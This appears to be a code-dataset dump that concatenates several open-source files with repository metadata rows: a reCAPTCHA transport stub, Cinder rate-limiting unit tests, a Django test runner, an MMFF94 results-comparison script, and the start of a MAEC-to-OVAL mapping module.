Awaitable[recaptchaenterprise.Assessment]
]]:
raise NotImplementedError()
@property
def annotate_assessment(self) -> Callable[
[recaptchaenterprise.AnnotateAssessmentRequest],
Union[
recaptchaenterprise.AnnotateAssessmentResponse,
Awaitable[recaptchaenterprise.AnnotateAssessmentResponse]
]]:
raise NotImplementedError()
@property
def create_key(self) -> Callable[
[recaptchaenterprise.CreateKeyRequest],
Union[
recaptchaenterprise.Key,
Awaitable[recaptchaenterprise.Key]
]]:
raise NotImplementedError()
@property
def list_keys(self) -> Callable[
[recaptchaenterprise.ListKeysRequest],
Union[
recaptchaenterprise.ListKeysResponse,
Awaitable[recaptchaenterprise.ListKeysResponse]
]]:
raise NotImplementedError()
@property
def get_key(self) -> Callable[
[recaptchaenterprise.GetKeyRequest],
Union[
recaptchaenterprise.Key,
Awaitable[recaptchaenterprise.Key]
]]:
raise NotImplementedError()
@property
def update_key(self) -> Callable[
[recaptchaenterprise.UpdateKeyRequest],
Union[
recaptchaenterprise.Key,
Awaitable[recaptchaenterprise.Key]
]]:
raise NotImplementedError()
@property
def delete_key(self) -> Callable[
[recaptchaenterprise.DeleteKeyRequest],
Union[
empty_pb2.Empty,
Awaitable[empty_pb2.Empty]
]]:
raise NotImplementedError()
__all__ = (
'RecaptchaEnterpriseServiceV1Beta1Transport',
)
| apache-2.0 | -3,883,420,898,301,742,000 | 37.980237 | 161 | 0.614683 | false |
ge0rgi/cinder | cinder/tests/unit/api/v2/test_limits.py | 1 | 29139 | # Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests dealing with HTTP rate-limiting.
"""
from oslo_serialization import jsonutils
import six
from six.moves import http_client
from six.moves import range
import webob
from cinder.api.v2 import limits
from cinder.api import views
import cinder.context
from cinder import test
TEST_LIMITS = [
limits.Limit("GET", "/delayed", "^/delayed", 1, limits.PER_MINUTE),
limits.Limit("POST", "*", ".*", 7, limits.PER_MINUTE),
limits.Limit("POST", "/volumes", "^/volumes", 3, limits.PER_MINUTE),
limits.Limit("PUT", "*", "", 10, limits.PER_MINUTE),
limits.Limit("PUT", "/volumes", "^/volumes", 5, limits.PER_MINUTE),
]
NS = {
'atom': 'http://www.w3.org/2005/Atom',
'ns': 'http://docs.openstack.org/common/api/v1.0',
}
class BaseLimitTestSuite(test.TestCase):
"""Base test suite which provides relevant stubs and time abstraction."""
def setUp(self):
super(BaseLimitTestSuite, self).setUp()
self.time = 0.0
self.mock_object(limits.Limit, "_get_time", self._get_time)
self.absolute_limits = {}
def fake_get_project_quotas(context, project_id, usages=True):
return {k: dict(limit=v) for k, v in self.absolute_limits.items()}
self.mock_object(cinder.quota.QUOTAS, "get_project_quotas",
fake_get_project_quotas)
def _get_time(self):
"""Return the "time" according to this test suite."""
return self.time
class LimitsControllerTest(BaseLimitTestSuite):
"""Tests for `limits.LimitsController` class."""
def setUp(self):
"""Run before each test."""
super(LimitsControllerTest, self).setUp()
self.controller = limits.create_resource()
def _get_index_request(self, accept_header="application/json"):
"""Helper to set routing arguments."""
request = webob.Request.blank("/")
request.accept = accept_header
request.environ["wsgiorg.routing_args"] = (None, {
"action": "index",
"controller": "",
})
context = cinder.context.RequestContext('testuser', 'testproject')
request.environ["cinder.context"] = context
return request
def _populate_limits(self, request):
"""Put limit info into a request."""
_limits = [
limits.Limit("GET", "*", ".*", 10, 60).display(),
limits.Limit("POST", "*", ".*", 5, 60 * 60).display(),
limits.Limit("GET", "changes-since*", "changes-since",
5, 60).display(),
]
request.environ["cinder.limits"] = _limits
return request
def test_empty_index_json(self):
"""Test getting empty limit details in JSON."""
request = self._get_index_request()
response = request.get_response(self.controller)
expected = {
"limits": {
"rate": [],
"absolute": {},
},
}
body = jsonutils.loads(response.body)
self.assertEqual(expected, body)
def test_index_json(self):
"""Test getting limit details in JSON."""
request = self._get_index_request()
request = self._populate_limits(request)
self.absolute_limits = {
'gigabytes': 512,
'volumes': 5,
}
response = request.get_response(self.controller)
expected = {
"limits": {
"rate": [
{
"regex": ".*",
"uri": "*",
"limit": [
{
"verb": "GET",
"next-available": "1970-01-01T00:00:00",
"unit": "MINUTE",
"value": 10,
"remaining": 10,
},
{
"verb": "POST",
"next-available": "1970-01-01T00:00:00",
"unit": "HOUR",
"value": 5,
"remaining": 5,
},
],
},
{
"regex": "changes-since",
"uri": "changes-since*",
"limit": [
{
"verb": "GET",
"next-available": "1970-01-01T00:00:00",
"unit": "MINUTE",
"value": 5,
"remaining": 5,
},
],
},
],
"absolute": {"maxTotalVolumeGigabytes": 512,
"maxTotalVolumes": 5, },
},
}
body = jsonutils.loads(response.body)
self.assertEqual(expected, body)
def _populate_limits_diff_regex(self, request):
"""Put limit info into a request."""
_limits = [
limits.Limit("GET", "*", ".*", 10, 60).display(),
limits.Limit("GET", "*", "*.*", 10, 60).display(),
]
request.environ["cinder.limits"] = _limits
return request
def test_index_diff_regex(self):
"""Test getting limit details in JSON."""
request = self._get_index_request()
request = self._populate_limits_diff_regex(request)
response = request.get_response(self.controller)
expected = {
"limits": {
"rate": [
{
"regex": ".*",
"uri": "*",
"limit": [
{
"verb": "GET",
"next-available": "1970-01-01T00:00:00",
"unit": "MINUTE",
"value": 10,
"remaining": 10,
},
],
},
{
"regex": "*.*",
"uri": "*",
"limit": [
{
"verb": "GET",
"next-available": "1970-01-01T00:00:00",
"unit": "MINUTE",
"value": 10,
"remaining": 10,
},
],
},
],
"absolute": {},
},
}
body = jsonutils.loads(response.body)
self.assertEqual(expected, body)
def _test_index_absolute_limits_json(self, expected):
request = self._get_index_request()
response = request.get_response(self.controller)
body = jsonutils.loads(response.body)
self.assertEqual(expected, body['limits']['absolute'])
def test_index_ignores_extra_absolute_limits_json(self):
self.absolute_limits = {'unknown_limit': 9001}
self._test_index_absolute_limits_json({})
class TestLimiter(limits.Limiter):
pass
class LimitMiddlewareTest(BaseLimitTestSuite):
"""Tests for the `limits.RateLimitingMiddleware` class."""
@webob.dec.wsgify
def _empty_app(self, request):
"""Do-nothing WSGI app."""
pass
def setUp(self):
"""Prepare middleware for use through fake WSGI app."""
super(LimitMiddlewareTest, self).setUp()
_limits = '(GET, *, .*, 1, MINUTE)'
self.app = limits.RateLimitingMiddleware(self._empty_app, _limits,
"%s.TestLimiter" %
self.__class__.__module__)
def test_limit_class(self):
"""Test that middleware selected correct limiter class."""
self.assertIsInstance(self.app._limiter, TestLimiter)
def test_good_request(self):
"""Test successful GET request through middleware."""
request = webob.Request.blank("/")
response = request.get_response(self.app)
self.assertEqual(200, response.status_int)
def test_limited_request_json(self):
"""Test a rate-limited (413) GET request through middleware."""
request = webob.Request.blank("/")
response = request.get_response(self.app)
self.assertEqual(200, response.status_int)
request = webob.Request.blank("/")
response = request.get_response(self.app)
self.assertEqual(413, response.status_int)
self.assertIn('Retry-After', response.headers)
retry_after = int(response.headers['Retry-After'])
self.assertAlmostEqual(retry_after, 60, 1)
body = jsonutils.loads(response.body)
expected = "Only 1 GET request(s) can be made to * every minute."
value = body["overLimitFault"]["details"].strip()
self.assertEqual(expected, value)
class LimitTest(BaseLimitTestSuite):
"""Tests for the `limits.Limit` class."""
def test_GET_no_delay(self):
"""Test a limit handles 1 GET per second."""
limit = limits.Limit("GET", "*", ".*", 1, 1)
delay = limit("GET", "/anything")
self.assertIsNone(delay)
self.assertEqual(0, limit.next_request)
self.assertEqual(0, limit.last_request)
def test_GET_delay(self):
"""Test two calls to 1 GET per second limit."""
limit = limits.Limit("GET", "*", ".*", 1, 1)
delay = limit("GET", "/anything")
self.assertIsNone(delay)
delay = limit("GET", "/anything")
self.assertEqual(1, delay)
self.assertEqual(1, limit.next_request)
self.assertEqual(0, limit.last_request)
self.time += 4
delay = limit("GET", "/anything")
self.assertIsNone(delay)
self.assertEqual(4, limit.next_request)
self.assertEqual(4, limit.last_request)
def test_invalid_limit(self):
"""Test that invalid limits are properly checked on construction."""
self.assertRaises(ValueError, limits.Limit, "GET", "*", ".*", 0, 1)
class ParseLimitsTest(BaseLimitTestSuite):
"""Tests for the default limits parser in the `limits.Limiter` class."""
def test_invalid(self):
"""Test that parse_limits() handles invalid input correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
';;;;;')
def test_bad_rule(self):
"""Test that parse_limits() handles bad rules correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
'GET, *, .*, 20, minute')
def test_missing_arg(self):
"""Test that parse_limits() handles missing args correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
'(GET, *, .*, 20)')
def test_bad_value(self):
"""Test that parse_limits() handles bad values correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
'(GET, *, .*, foo, minute)')
def test_bad_unit(self):
"""Test that parse_limits() handles bad units correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
'(GET, *, .*, 20, lightyears)')
def test_multiple_rules(self):
"""Test that parse_limits() handles multiple rules correctly."""
try:
l = limits.Limiter.parse_limits('(get, *, .*, 20, minute);'
'(PUT, /foo*, /foo.*, 10, hour);'
'(POST, /bar*, /bar.*, 5, second);'
'(Say, /derp*, /derp.*, 1, day)')
except ValueError as e:
self.assertFalse(six.text_type(e))
# Make sure the number of returned limits are correct
self.assertEqual(4, len(l))
# Check all the verbs...
expected = ['GET', 'PUT', 'POST', 'SAY']
self.assertEqual(expected, [t.verb for t in l])
# ...the URIs...
expected = ['*', '/foo*', '/bar*', '/derp*']
self.assertEqual(expected, [t.uri for t in l])
# ...the regexes...
expected = ['.*', '/foo.*', '/bar.*', '/derp.*']
self.assertEqual(expected, [t.regex for t in l])
# ...the values...
expected = [20, 10, 5, 1]
self.assertEqual(expected, [t.value for t in l])
# ...and the units...
expected = [limits.PER_MINUTE, limits.PER_HOUR,
limits.PER_SECOND, limits.PER_DAY]
self.assertEqual(expected, [t.unit for t in l])
class LimiterTest(BaseLimitTestSuite):
"""Tests for the in-memory `limits.Limiter` class."""
def setUp(self):
"""Run before each test."""
super(LimiterTest, self).setUp()
userlimits = {'limits.user3': '',
'limits.user0': '(get, *, .*, 4, minute);'
'(put, *, .*, 2, minute)'}
self.limiter = limits.Limiter(TEST_LIMITS, **userlimits)
def _check(self, num, verb, url, username=None):
"""Check and yield results from checks."""
for x in range(num):
yield self.limiter.check_for_delay(verb, url, username)[0]
def _check_sum(self, num, verb, url, username=None):
"""Check and sum results from checks."""
results = self._check(num, verb, url, username)
return sum(item for item in results if item)
def test_no_delay_GET(self):
"""Ensure no delay on a single call for a limit verb we didn't set."""
delay = self.limiter.check_for_delay("GET", "/anything")
self.assertEqual((None, None), delay)
def test_no_delay_PUT(self):
"""Ensure no delay on a single call for a known limit."""
delay = self.limiter.check_for_delay("PUT", "/anything")
self.assertEqual((None, None), delay)
def test_delay_PUT(self):
"""Test delay on 11th PUT request.
Ensure the 11th PUT will result in a delay of 6.0 seconds until
        the next request will be granted.
"""
expected = [None] * 10 + [6.0]
results = list(self._check(11, "PUT", "/anything"))
self.assertEqual(expected, results)
def test_delay_POST(self):
"""Test delay on 8th POST request.
Ensure the 8th POST will result in a delay of 6.0 seconds until
        the next request will be granted.
"""
expected = [None] * 7
results = list(self._check(7, "POST", "/anything"))
self.assertEqual(expected, results)
expected = 60.0 / 7.0
results = self._check_sum(1, "POST", "/anything")
self.assertAlmostEqual(expected, results, 8)
def test_delay_GET(self):
"""Ensure the 11th GET will result in NO delay."""
expected = [None] * 11
results = list(self._check(11, "GET", "/anything"))
self.assertEqual(expected, results)
expected = [None] * 4 + [15.0]
results = list(self._check(5, "GET", "/foo", "user0"))
self.assertEqual(expected, results)
def test_delay_PUT_volumes(self):
"""Test delay on /volumes.
Ensure PUT on /volumes limits at 5 requests, and PUT elsewhere
is still OK after 5 requests...but then after 11 total requests,
PUT limiting kicks in.
"""
# First 6 requests on PUT /volumes
expected = [None] * 5 + [12.0]
results = list(self._check(6, "PUT", "/volumes"))
self.assertEqual(expected, results)
# Next 5 request on PUT /anything
expected = [None] * 4 + [6.0]
results = list(self._check(5, "PUT", "/anything"))
self.assertEqual(expected, results)
def test_delay_PUT_wait(self):
"""Test limit is lifted again.
Ensure after hitting the limit and then waiting for
the correct amount of time, the limit will be lifted.
"""
expected = [None] * 10 + [6.0]
results = list(self._check(11, "PUT", "/anything"))
self.assertEqual(expected, results)
# Advance time
self.time += 6.0
expected = [None, 6.0]
results = list(self._check(2, "PUT", "/anything"))
self.assertEqual(expected, results)
def test_multiple_delays(self):
"""Ensure multiple requests still get a delay."""
expected = [None] * 10 + [6.0] * 10
results = list(self._check(20, "PUT", "/anything"))
self.assertEqual(expected, results)
self.time += 1.0
expected = [5.0] * 10
results = list(self._check(10, "PUT", "/anything"))
self.assertEqual(expected, results)
expected = [None] * 2 + [30.0] * 8
results = list(self._check(10, "PUT", "/anything", "user0"))
self.assertEqual(expected, results)
def test_user_limit(self):
"""Test user-specific limits."""
self.assertEqual([], self.limiter.levels['user3'])
self.assertEqual(2, len(self.limiter.levels['user0']))
def test_multiple_users(self):
"""Tests involving multiple users."""
# User0
expected = [None] * 2 + [30.0] * 8
results = list(self._check(10, "PUT", "/anything", "user0"))
self.assertEqual(expected, results)
# User1
expected = [None] * 10 + [6.0] * 10
results = list(self._check(20, "PUT", "/anything", "user1"))
self.assertEqual(expected, results)
# User2
expected = [None] * 10 + [6.0] * 5
results = list(self._check(15, "PUT", "/anything", "user2"))
self.assertEqual(expected, results)
# User3
expected = [None] * 20
results = list(self._check(20, "PUT", "/anything", "user3"))
self.assertEqual(expected, results)
self.time += 1.0
# User1 again
expected = [5.0] * 10
results = list(self._check(10, "PUT", "/anything", "user1"))
self.assertEqual(expected, results)
self.time += 1.0
# User1 again
expected = [4.0] * 5
results = list(self._check(5, "PUT", "/anything", "user2"))
self.assertEqual(expected, results)
# User0 again
expected = [28.0]
results = list(self._check(1, "PUT", "/anything", "user0"))
self.assertEqual(expected, results)
self.time += 28.0
expected = [None, 30.0]
results = list(self._check(2, "PUT", "/anything", "user0"))
self.assertEqual(expected, results)
class WsgiLimiterTest(BaseLimitTestSuite):
"""Tests for `limits.WsgiLimiter` class."""
def setUp(self):
"""Run before each test."""
super(WsgiLimiterTest, self).setUp()
self.app = limits.WsgiLimiter(TEST_LIMITS)
def _request_data(self, verb, path):
"""Get data describing a limit request verb/path."""
return jsonutils.dump_as_bytes({"verb": verb, "path": path})
def _request(self, verb, url, username=None):
"""POST request to given url by given username.
Make sure that POSTing to the given url causes the given username
to perform the given action. Make the internal rate limiter return
delay and make sure that the WSGI app returns the correct response.
"""
if username:
request = webob.Request.blank("/%s" % username)
else:
request = webob.Request.blank("/")
request.method = "POST"
request.body = self._request_data(verb, url)
response = request.get_response(self.app)
if "X-Wait-Seconds" in response.headers:
self.assertEqual(403, response.status_int)
return response.headers["X-Wait-Seconds"]
self.assertEqual(204, response.status_int)
def test_invalid_methods(self):
"""Only POSTs should work."""
for method in ["GET", "PUT", "DELETE", "HEAD", "OPTIONS"]:
request = webob.Request.blank("/", method=method)
response = request.get_response(self.app)
self.assertEqual(405, response.status_int)
def test_good_url(self):
delay = self._request("GET", "/something")
self.assertIsNone(delay)
def test_escaping(self):
delay = self._request("GET", "/something/jump%20up")
self.assertIsNone(delay)
def test_response_to_delays(self):
delay = self._request("GET", "/delayed")
self.assertIsNone(delay)
delay = self._request("GET", "/delayed")
self.assertEqual('60.00', delay)
def test_response_to_delays_usernames(self):
delay = self._request("GET", "/delayed", "user1")
self.assertIsNone(delay)
delay = self._request("GET", "/delayed", "user2")
self.assertIsNone(delay)
delay = self._request("GET", "/delayed", "user1")
self.assertEqual('60.00', delay)
delay = self._request("GET", "/delayed", "user2")
self.assertEqual('60.00', delay)
class FakeHttplibSocket(object):
"""Fake `http_client.HTTPResponse` replacement."""
def __init__(self, response_string):
"""Initialize new `FakeHttplibSocket`."""
if isinstance(response_string, six.text_type):
response_string = response_string.encode('utf-8')
self._buffer = six.BytesIO(response_string)
def makefile(self, mode, *args):
"""Returns the socket's internal buffer."""
return self._buffer
class FakeHttplibConnection(object):
"""Fake `http_client.HTTPConnection`."""
def __init__(self, app, host):
"""Initialize `FakeHttplibConnection`."""
self.app = app
self.host = host
def request(self, method, path, body="", headers=None):
"""Fake request handler.
Requests made via this connection actually get translated and
        routed into our WSGI app; we then wait for the response and turn
it back into an `http_client.HTTPResponse`.
"""
if not headers:
headers = {}
req = webob.Request.blank(path)
req.method = method
req.headers = headers
req.host = self.host
req.body = body
resp = str(req.get_response(self.app))
resp = "HTTP/1.0 %s" % resp
sock = FakeHttplibSocket(resp)
self.http_response = http_client.HTTPResponse(sock)
self.http_response.begin()
def getresponse(self):
"""Return our generated response from the request."""
return self.http_response
def wire_HTTPConnection_to_WSGI(host, app):
"""Monkeypatches HTTPConnection.
Monkeypatches HTTPConnection so that if you try to connect to host, you
are instead routed straight to the given WSGI app.
After calling this method, when any code calls
http_client.HTTPConnection(host)
the connection object will be a fake. Its requests will be sent directly
to the given WSGI app rather than through a socket.
Code connecting to hosts other than host will not be affected.
This method may be called multiple times to map different hosts to
different apps.
This method returns the original HTTPConnection object, so that the caller
can restore the default HTTPConnection interface (for all hosts).
"""
class HTTPConnectionDecorator(object):
"""Decorator to mock the HTTPConecction class.
Wraps the real HTTPConnection class so that when you instantiate
the class you might instead get a fake instance.
"""
def __init__(self, wrapped):
self.wrapped = wrapped
def __call__(self, connection_host, *args, **kwargs):
if connection_host == host:
return FakeHttplibConnection(app, host)
else:
return self.wrapped(connection_host, *args, **kwargs)
oldHTTPConnection = http_client.HTTPConnection
new_http_connection = HTTPConnectionDecorator(http_client.HTTPConnection)
http_client.HTTPConnection = new_http_connection
return oldHTTPConnection
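# Illustrative sketch (not part of the original test suite): once wired, client
# code that connects to the given host is served by the WSGI app directly, with
# no real socket involved. The host and app below are simply the values used by
# the tests in this module.
#
#   old = wire_HTTPConnection_to_WSGI("169.254.0.1:80", limits.WsgiLimiter(TEST_LIMITS))
#   conn = http_client.HTTPConnection("169.254.0.1:80")
#   conn.request("POST", "/", body=jsonutils.dump_as_bytes({"verb": "GET", "path": "/x"}))
#   resp = conn.getresponse()             # response produced by the WSGI app
#   http_client.HTTPConnection = old      # restore the real class afterwards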
class WsgiLimiterProxyTest(BaseLimitTestSuite):
"""Tests for the `limits.WsgiLimiterProxy` class."""
def setUp(self):
"""setUp() for WsgiLimiterProxyTest.
Do some nifty HTTP/WSGI magic which allows for WSGI to be called
directly by something like the `http_client` library.
"""
super(WsgiLimiterProxyTest, self).setUp()
self.app = limits.WsgiLimiter(TEST_LIMITS)
oldHTTPConnection = (
wire_HTTPConnection_to_WSGI("169.254.0.1:80", self.app))
self.proxy = limits.WsgiLimiterProxy("169.254.0.1:80")
self.addCleanup(self._restore, oldHTTPConnection)
def _restore(self, oldHTTPConnection):
# restore original HTTPConnection object
http_client.HTTPConnection = oldHTTPConnection
def test_200(self):
"""Successful request test."""
delay = self.proxy.check_for_delay("GET", "/anything")
self.assertEqual((None, None), delay)
def test_403(self):
"""Forbidden request test."""
delay = self.proxy.check_for_delay("GET", "/delayed")
self.assertEqual((None, None), delay)
delay, error = self.proxy.check_for_delay("GET", "/delayed")
error = error.strip()
expected = ("60.00",
b"403 Forbidden\n\nOnly 1 GET request(s) can be "
b"made to /delayed every minute.")
self.assertEqual(expected, (delay, error))
class LimitsViewBuilderTest(test.TestCase):
def setUp(self):
super(LimitsViewBuilderTest, self).setUp()
self.view_builder = views.limits.ViewBuilder()
self.rate_limits = [{"URI": "*",
"regex": ".*",
"value": 10,
"verb": "POST",
"remaining": 2,
"unit": "MINUTE",
"resetTime": 1311272226},
{"URI": "*/volumes",
"regex": "^/volumes",
"value": 50,
"verb": "POST",
"remaining": 10,
"unit": "DAY",
"resetTime": 1311272226}]
self.absolute_limits = {"gigabytes": 1,
"backup_gigabytes": 2,
"volumes": 3,
"snapshots": 4,
"backups": 5}
def test_build_limits(self):
tdate = "2011-07-21T18:17:06"
expected_limits = {
"limits": {"rate": [{"uri": "*",
"regex": ".*",
"limit": [{"value": 10,
"verb": "POST",
"remaining": 2,
"unit": "MINUTE",
"next-available": tdate}]},
{"uri": "*/volumes",
"regex": "^/volumes",
"limit": [{"value": 50,
"verb": "POST",
"remaining": 10,
"unit": "DAY",
"next-available": tdate}]}],
"absolute": {"maxTotalVolumeGigabytes": 1,
"maxTotalBackupGigabytes": 2,
"maxTotalVolumes": 3,
"maxTotalSnapshots": 4,
"maxTotalBackups": 5}}}
output = self.view_builder.build(self.rate_limits,
self.absolute_limits)
self.assertDictEqual(expected_limits, output)
def test_build_limits_empty_limits(self):
expected_limits = {"limits": {"rate": [],
"absolute": {}}}
abs_limits = {}
rate_limits = []
output = self.view_builder.build(rate_limits, abs_limits)
self.assertDictEqual(expected_limits, output)
| apache-2.0 | -5,903,511,170,793,343,000 | 34.929716 | 79 | 0.529874 | false |
thesgc/cbh_datastore_ws | runtests.py | 1 | 1190 | import sys
try:
from django.conf import settings
from django.test.utils import get_runner
settings.configure(
DEBUG=True,
USE_TZ=True,
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
},
ROOT_URLCONF="cbh_datastore_ws.urls",
INSTALLED_APPS=[
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sites",
"cbh_datastore_ws",
],
SITE_ID=1,
MIDDLEWARE_CLASSES=(),
)
try:
import django
setup = django.setup
except AttributeError:
pass
else:
setup()
except ImportError:
import traceback
traceback.print_exc()
raise ImportError(
"To fix this error, run: pip install -r requirements-test.txt")
def run_tests(*test_args):
if not test_args:
test_args = ['tests']
# Run tests
TestRunner = get_runner(settings)
test_runner = TestRunner()
failures = test_runner.run_tests(test_args)
if failures:
sys.exit(bool(failures))
if __name__ == '__main__':
run_tests(*sys.argv[1:])
| mit | -6,751,464,929,567,952,000 | 20.25 | 71 | 0.553782 | false |
kylelutz/chemkit | tests/auto/plugins/mmff/analyze.py | 1 | 3504 | #!/usr/bin/python
# this script compares the mmff94.expected and mmff94.actual files
# and outputs the differences
import os
import sys
import xml.dom.minidom
COLORS_ENABLED = False
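# Expected layout of both results files (a sketch inferred from the parser
# below; the name of the root element is an assumption, only the 'molecule'
# and 'atom' elements and their attributes are actually read):
#
#   <results>
#     <molecule name="..." energy="...">
#       <atom type="..." charge="..."/>
#     </molecule>
#   </results>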
class AtomResults:
def __init__(self, type, charge):
self.type = type
self.charge = charge
class MoleculeResults:
def __init__(self, name, energy):
self.name = name
self.energy = energy
self.atoms = []
class ResultsFile:
def __init__(self, fileName):
self.fileName = fileName
self.molecules = []
def read(self):
doc = xml.dom.minidom.parse(self.fileName)
for moleculeElem in doc.getElementsByTagName('molecule'):
name = moleculeElem.getAttribute('name')
energy = float(moleculeElem.getAttribute('energy'))
moleculeResults = MoleculeResults(name, energy)
for atomElem in moleculeElem.getElementsByTagName('atom'):
type = atomElem.getAttribute('type')
charge = float(atomElem.getAttribute('charge'))
moleculeResults.atoms.append(AtomResults(type, charge))
self.molecules.append(moleculeResults)
if __name__ == '__main__':
actualResultsFile = 'mmff94.actual'
expectedResultsFile = 'mmff94.expected'
if not os.path.exists(actualResultsFile):
print 'could not find actual results file (%s)' % actualResultsFile
sys.exit(-1)
if not os.path.exists(expectedResultsFile):
print 'could not find expected results file (%s)' % expectedResultsFile
sys.exit(-1)
actualResults = ResultsFile(actualResultsFile)
actualResults.read()
expectedResults = ResultsFile(expectedResultsFile)
expectedResults.read()
# escape codes to color text
RED_COLOR = '\033[91m'
END_COLOR = '\033[0m'
if not COLORS_ENABLED:
RED_COLOR = ''
END_COLOR = ''
ATOMS_FAILED = 0
MOLECULES_FAILED = 0
# compare files
expectedMoleculeIndex = 0
for i, actualMolecule in enumerate(actualResults.molecules):
expectedMolecule = expectedResults.molecules[expectedMoleculeIndex]
while expectedMolecule.name != actualMolecule.name:
expectedMoleculeIndex += 1
expectedMolecule = expectedResults.molecules[expectedMoleculeIndex]
print '%i. %s' % (expectedMoleculeIndex+1, actualMolecule.name)
for j in range(len(actualMolecule.atoms)):
actualAtom = actualMolecule.atoms[j]
expectedAtom = expectedMolecule.atoms[j]
expectedTypeText = ''
colorCode = ''
if(actualAtom.type != expectedAtom.type or
(abs(actualAtom.charge - expectedAtom.charge) > 0.01)):
ATOMS_FAILED += 1
colorCode = RED_COLOR
expectedTypeText = '%s[%s, %s] -- FAILED%s' % (colorCode, expectedAtom.type, expectedAtom.charge, END_COLOR)
print ' %i. %s, %s %s' % (j+1, actualAtom.type, actualAtom.charge, expectedTypeText)
colorCode = ''
if(int(actualMolecule.energy) != int(expectedMolecule.energy)):
MOLECULES_FAILED += 1
colorCode = RED_COLOR
print 'energy: %f %s[%f]%s' % (actualMolecule.energy, colorCode, expectedMolecule.energy, END_COLOR)
# print some statistics
print >> sys.stderr, ''
print >> sys.stderr, 'atoms: %i failed' % ATOMS_FAILED
print >> sys.stderr, 'molecules: %i failed' % MOLECULES_FAILED
| bsd-3-clause | 8,729,999,212,681,322,000 | 32.371429 | 124 | 0.631849 | false |
MAECProject/maec-to-oval | cybox_oval_mappings.py | 1 | 10331 | #MAEC -> OVAL Translator
#v0.94 BETA
#Generic mappings class
#Generates OVAL tests/objects/states from a CybOX Defined Object
import oval57 as oval
class cybox_oval_mappings(object):
def __init__(self, id_namespace):
self.test_id_base = 0
self.obj_id_base = 0
self.ste_id_base = 0
self.def_id_base = 0
self.id_namespace = id_namespace
#Mappings
#CybOX Condition to OVAL operation mappings
self.operator_condition_mappings = {'Equals':'equals','DoesNotEqual':'not equal','Contains':'pattern match',\
'GreaterThan':'greater than', 'GreaterThanOrEqual':'greater than or equal',\
'LessThan':'less than','LessThanOrEqual':'less than or equal','FitsPattern':'pattern match',\
'BitwiseAnd':'bitwise and', 'BitwiseOr':'bitwise or'}
#CybOX Object Type to OVAL object mappings
self.object_mappings = {'WinRegistryKeyObj:WindowsRegistryKeyObjectType':'registry_object', 'FileObj:FileObjectType':'file_object',
'WinFileObj:WindowsFileObjectType':'file_object', 'WinExecutableFileObj:WindowsExecutableFileObjectType':'file_object'}
#CybOX FileObject to OVAL file_object mappings (CybOX element name : {OVAL element name, OVAL element datatype})
self.file_object_mappings = {'File_Path':{'name':'path','datatype':'string'},'Full_Path':{'name':'filepath','datatype':'string'},
'File_Name':{'name':'filename', 'datatype':'string'}}
#CybOX FileObject to OVAL file_state mappings
self.file_state_mappings = {'Size_In_Bytes':{'name':'size','datatype':'int'},'Accessed_Time':{'name':'a_time','datatype':'int'},\
'Modified_Time':{'name':'m_time','datatype':'int'},'Created_Time':{'name':'c_time','datatype':'int'}}
#CybOX WinRegistryObject to OVAL registry_object mappings
self.registry_object_mappings = {'Key':{'name':'key','datatype':'string'},'Hive':{'name':'hive','datatype':'string'},'Name':{'name':'name','datatype':'string'}}
#CybOX WinRegistryObject Values to OVAL registry_state mappings
self.registry_state_mappings = {'Name':{'name':'name','datatype':'string'},'Data':{'name':'value','datatype':'string'},'Datatype':{'name':'type','datatype':'string'}}
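    # Rough usage sketch (illustration only; the namespace and reference strings
    # are made-up examples):
    #   mappings = cybox_oval_mappings('example.namespace')
    #   entities = mappings.create_oval(defined_object, 'maec-action-1')
    #   # -> dict with 'test', 'object' and, when states were built, 'state' keys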
#Creates and returns a dictionary of OVAL test, object, and state (if applicable)
def create_oval(self, cybox_defined_object, reference):
oval_entities = {}
oval_states = []
object_type = cybox_defined_object._XSI_NS + ':' + cybox_defined_object._XSI_TYPE
if object_type in self.object_mappings.keys():
oval_object = self.create_oval_object(object_type, cybox_defined_object)
if oval_object is not None:
if object_type == 'WinRegistryKeyObj:WindowsRegistryKeyObjectType':
self.process_registry_values(cybox_defined_object, oval_object, oval_states)
else:
state = self.create_oval_state(object_type, cybox_defined_object)
if state is not None:
oval_states.append(self.create_oval_state(object_type, cybox_defined_object))
oval_test = self.create_oval_test(object_type, oval_object, oval_entities, oval_states, reference)
oval_entities['test'] = oval_test
oval_entities['object'] = oval_object
if oval_states is not None and len(oval_states) > 0:
oval_entities['state'] = oval_states
return oval_entities
else:
return None
#Create the OVAL object
def create_oval_object(self, object_type, cybox_defined_object):
oval_object_type = self.object_mappings.get(object_type)
oval_object_mappings = self.object_mappings.get(object_type) + '_mappings'
oval_object = getattr(oval,oval_object_type)()
oval_object.set_id(self.generate_obj_id())
oval_object.set_version(1)
object_fields = cybox_defined_object._fields
# File Object related corner cases
if "File" in object_type:
if object_fields["Full_Path"]:
del object_fields["File_Name"]
del object_fields["File_Path"]
# Corner case where file_path is meant to be used as the full path to the file
elif object_fields["File_Path"] and (not object_fields["Full_Path"] and not object_fields["File_Name"]):
object_fields["Full_Path"] = object_fields["File_Path"]
del object_fields["File_Path"]
for element, value in object_fields.items():
if value is not None:
if element in getattr(getattr(self,oval_object_mappings),'keys')():
element_dictionary = getattr(getattr(self,oval_object_mappings),'get')(element)
element_name = element_dictionary.get('name')
element_datatype = element_dictionary.get('datatype')
method = 'set_' + element_name
getattr(oval_object,method)(oval.EntityBaseType(datatype = element_datatype, operation = self.operator_condition_mappings.get(value), valueOf_=value))
#Do some basic object sanity checking for certain objects
if object_type == 'WinRegistryKeyObj:WindowsRegistryKeyObjectType' and (oval_object.hive is None or oval_object.key is None):
return None
elif 'FileObjectType' in object_type and (oval_object.filepath is None and (oval_object.path is None or oval_object.filename is None)):
return None
return oval_object
#Create any OVAL states
def create_oval_state(self, object_type, cybox_defined_object):
